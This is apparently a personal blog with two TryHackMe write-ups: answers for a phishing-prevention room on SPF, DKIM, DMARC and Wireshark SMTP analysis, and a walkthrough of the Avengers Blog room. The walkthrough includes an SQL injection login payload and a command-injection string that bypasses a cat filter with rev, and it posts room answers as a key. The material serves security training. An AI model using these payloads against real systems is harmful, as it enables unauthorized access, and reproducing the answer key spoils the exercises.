Saturday, January 17, 2026

TryHackMe - Phishing Prevention room

Phishing Prevention is the fourth room in TryHackMe’s Phishing Analysis module under the SOC Level 1 path. If you're working through the room and get stuck, this guide provides clear hints and answers to help you progress without frustration.

Task 2

Q1 Based on TryHackMe's SPF record above, how many domains are authorized to send email on its behalf?

3

Q2 What is the intended action of an email that returns a SoftFail verification result?

Flag



Task 3

Q1 Based on the sample header above, what is the reason for the permerror?

no key for signature


Task 4

Q1 Which DMARC policy provides the greatest amount of protection by blocking emails that fail the DMARC check?

p=reject
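To show what Task 2 and Task 4 are asking you to read off a record, here is a small parser for SPF and DMARC TXT records. It is an added example, not code from the room; the two records it parses are constructed placeholders, not TryHackMe's real DNS data.

```python
import re

# Constructed sample records (placeholders, not the room's real DNS data).
SPF_RECORD = ("v=spf1 include:_spf.example.com include:mail.example.org "
              "a mx:relay.example.net ip4:198.51.100.0/24 ~all")
DMARC_RECORD = "v=DMARC1; p=reject; sp=quarantine; rua=mailto:dmarc@example.com; pct=100"

# Mechanisms whose argument names another domain. A bare 'a' or 'mx' refers to the
# record's own domain and adds nothing; ip4/ip6 list addresses, not domains.
DOMAIN_TERM = re.compile(r"^(include|a|mx|exists|redirect)[:=](?P<domain>[^/]+)")
ALL_RESULTS = {"+": "Pass", "-": "Fail", "~": "SoftFail", "?": "Neutral"}


def spf_authorized_domains(record: str) -> list:
    """Domains an SPF record delegates sending rights to."""
    if not record.startswith("v=spf1"):
        raise ValueError("not an SPF record")
    found = []
    for term in record.split()[1:]:
        m = DOMAIN_TERM.match(term.lstrip("+-~?"))
        if m:
            found.append(m.group("domain"))
    return found


def spf_all_result(record: str) -> str:
    """Result a sender matched by no mechanism gets, taken from the 'all' qualifier.
    SoftFail (~all) means accept but mark the message; Fail (-all) means reject."""
    for term in record.split():
        if term.lstrip("+-~?") == "all":
            return ALL_RESULTS.get(term[0], "Pass")   # bare 'all' is '+all'
    return "Neutral"   # no 'all' mechanism: the default result is Neutral


def dmarc_policy(record: str) -> dict:
    """DMARC tags as a dict; 'p' is the action applied to mail failing DMARC."""
    tags = dict(t.strip().split("=", 1) for t in record.split(";") if "=" in t)
    if tags.get("v") != "DMARC1":
        raise ValueError("not a DMARC record")
    return tags


if __name__ == "__main__":
    print(spf_authorized_domains(SPF_RECORD))   # three delegated domains
    print(spf_all_result(SPF_RECORD))           # SoftFail
    print(dmarc_policy(DMARC_RECORD)["p"])      # reject
```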


Task 5

Q1 Which S/MIME component ensures that only the intended recipient can read the contents of an email message?

Can be found in the task description - encryption


Task 6

Q1 Which Wireshark filter can you use to narrow down your results based on SMTP response codes?

smtp.response.code

Q2 How many packets in the capture contain the SMTP response code 220 Service ready?

19

Q3 One SMTP response indicates that an email was blocked by spamhaus.org. What response code did the server return?

553

Q4 Based on the packet from the previous question, what is the full Response code: message?

Requested action not taken: mailbox name not allowed (553)

Q5 Search for response code 552. How many messages were blocked for presenting potential security issues?

6
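The counting that Task 6 does with the smtp.response.code filter in Wireshark can also be done over a text export of the server's responses. The following is an added example, not part of the room; the transcript it works on is constructed, not the room's capture.

```python
import re
from collections import Counter

# Constructed server responses, as a pcap-to-text export might list them (not the room's pcap).
SMTP_LOG = """\
220 mx.example.test ESMTP Service ready
250-mx.example.test Hello client.example.test
250 OK
553 5.3.0 Requested action not taken: mailbox name not allowed; see spamhaus.org
552 5.7.0 Message blocked for presenting a potential security issue
220 mx.example.test ESMTP Service ready
552 5.7.0 Message blocked for presenting a potential security issue
354 Start mail input; end with <CRLF>.<CRLF>
250 2.0.0 Queued
"""

# A response line is a three-digit code followed by a space (final line) or '-' (continuation).
RESPONSE_RE = re.compile(r"^(?P<code>[2-5]\d\d)[ -](?P<text>.*)$")


def parse_responses(log: str) -> list:
    """Every (code, message) pair in the transcript, one per response line."""
    pairs = []
    for line in log.splitlines():
        m = RESPONSE_RE.match(line)
        if m:
            pairs.append((int(m.group("code")), m.group("text").strip()))
    return pairs


def count_by_code(log: str) -> Counter:
    """Same grouping as filtering on smtp.response.code: how many lines carry each code."""
    return Counter(code for code, _ in parse_responses(log))


def rejections(log: str, keyword: str = "") -> list:
    """Permanent failures (5xx), optionally only those whose reason text contains keyword."""
    return [(c, t) for c, t in parse_responses(log)
            if 500 <= c < 600 and keyword.lower() in t.lower()]


if __name__ == "__main__":
    counts = count_by_code(SMTP_LOG)
    print(f"220 Service ready: {counts[220]}, 552 blocked: {counts[552]}")
    for code, text in rejections(SMTP_LOG, "spamhaus"):
        print(code, text)
```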


Task 7

Q1 How many SMTP packets are available for analysis?

Filter the pcap file for SMTP traffic; the number of matching packets is your answer.

Q2 What is the name of the attachment in packet 270?

I was sorting the packets by id/number, searched for 270, checked the Line-based text data and saw it there.

Or use Ctrl+G, enter the packet number and jump to that packet.

Q3 According to the message in packet 270, which Host IP address is not responding, making the message undeliverable?

You can read through the email content and find the correct IP

Q4 By filtering for imf, which email client was used to send the message containing the attachment attachment.scr?

Filter by imf, then look through the emails to find the one that contains the attachment.

Q5 Which type of encoding is used for this potentially malicious attachment?

The answer can be found under Content-Transfer-Encoding.
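The fields Task 7 has you read out of the imf packets (the client in X-Mailer, the failing host in the bounce text, the attachment's filename and Content-Transfer-Encoding) can be pulled programmatically with Python's email module. Added example, not the room's code; the message below is constructed, with attachment.scr being the only name taken from the task and the rest placeholders.

```python
import re
from email import message_from_string, policy

# Constructed message, not an export from the room's capture; only attachment.scr is from the task.
RAW_MESSAGE = """\
From: postmaster@example.test
Subject: Undeliverable notice
X-Mailer: ExampleMailer 1.0
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="BOUNDARY"

--BOUNDARY
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 7bit

Delivery failed: host 203.0.113.10 is not responding.
--BOUNDARY
Content-Type: application/octet-stream; name="attachment.scr"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="attachment.scr"

Tm90IGEgcmVhbCBleGVjdXRhYmxlLg==
--BOUNDARY--
"""

RISKY_EXTENSIONS = (".scr", ".exe", ".js", ".vbs", ".bat", ".cmd", ".hta")
IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def sending_client(raw: str) -> str:
    """The client named in X-Mailer (or User-Agent); '' if neither header is present."""
    msg = message_from_string(raw, policy=policy.default)
    return str(msg.get("X-Mailer") or msg.get("User-Agent") or "")


def unresponsive_hosts(raw: str) -> list:
    """IPv4 addresses mentioned in the plain-text body (the bounce's failing host)."""
    msg = message_from_string(raw, policy=policy.default)
    body = msg.get_body(preferencelist=("plain",))
    return IP_RE.findall(body.get_content()) if body else []


def attachments(raw: str) -> list:
    """One dict per attachment: filename, transfer encoding and a risky-extension flag."""
    msg = message_from_string(raw, policy=policy.default)
    found = []
    for part in msg.iter_attachments():   # skips the body part, yields the rest
        name = part.get_filename() or ""
        found.append({"filename": name,
                      "encoding": str(part.get("Content-Transfer-Encoding", "")).lower(),
                      "risky": name.lower().endswith(RISKY_EXTENSIONS)})
    return found
```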

Task 8

Q1 A security team wants to implement a control to detect hidden malware inside email attachments.
They need a way to analyze suspicious files without risking infection on real systems.
Which protective technique would allow them to observe a file's behavior safely?

The answer can be found in the explanation part of this task - Sandboxing

Tuesday, January 6, 2026

TryHackMe Avengers Blog

Hi, 

This is a write-up for the THM Avengers room on TryHackMe.

Task 2 Cookies

Open the browser, open the developer tools, go to Storage and check the value of the cookie.

Task 3 HTTP Headers

For this one you will also use the developer tools: check the headers in the Network tab and there you find the flag.

Task 4 Enumeration and FTP

nmap -sV VM_IP


We can see that FTP is open.

Open a CLI, run ftp vm_ip and log in to the FTP service with the provided username and password.

  1. List the files and directories with the dir or ls command
  2. Move to the directory with cd dir_name
  3. List the files in dir_name
  4. Use the command get file_name to download the file
  5. On your AttackBox open the file and you get flag3


230 Login successful.

Remote system type is UNIX.

Using binary mode to transfer files.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

drwxr-xr-x    2 1001     1001         4096 Oct 04  2019 files

226 Directory send OK.

ftp> cd files

250 Directory successfully changed.

ftp> ls

200 PORT command successful. Consider using PASV.

150 Here comes the directory listing.

-rw-r--r--    1 0        0              33 Oct 04  2019 flag3.txt

226 Directory send OK.

ftp> get flag3.txt

local: flag3.txt remote: flag3.txt


Task 5 GoBuster

For this task I ran the following gobuster command to find the answer:

gobuster dir -t 40 -u VM_IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt

Task 6 SQL Injection

Make sure you enter the same payload for username and password

username  :-    ' or 1=1 -- -
password  :-    ' or 1=1 -- -
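Why the payload above logs you in, and what stops it, shown as an added example that is not the room's code: an in-memory SQLite users table with a constructed account, the concatenated query beside the parameterized one.

```python
import sqlite3

PAYLOAD = "' or 1=1 -- -"   # the payload used in the task, for both fields


def make_db() -> sqlite3.Connection:
    """Constructed sample table; a real application stores a password hash, not plaintext."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('groot', 'iamgroot')")
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """String concatenation: the leading quote closes the literal, 'or 1=1' makes the
    WHERE clause true for every row, and '-- -' comments out the password check."""
    sql = (f"SELECT COUNT(*) FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters are passed as data, so the payload is compared literally and matches nothing."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, PAYLOAD))   # True
    print("parameterized login with payload:", login_safe(db, PAYLOAD, PAYLOAD))     # False
    print("parameterized login with real creds:", login_safe(db, "groot", "iamgroot"))  # True
```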

Task 7 Remote Code Execution and Linux

For this task you try using the command:
cd ../; ls; cat flag5.txt
but you see that the cat command is disallowed, as well as head, tail and others. I started to google and found the rev utility, which copies the specified files to standard output, reversing the order of characters in every line.

With this command we get the flag in reverse order, so we need to copy it to the AttackBox command line and reverse it again:

echo "reversed_flag_string" | rev
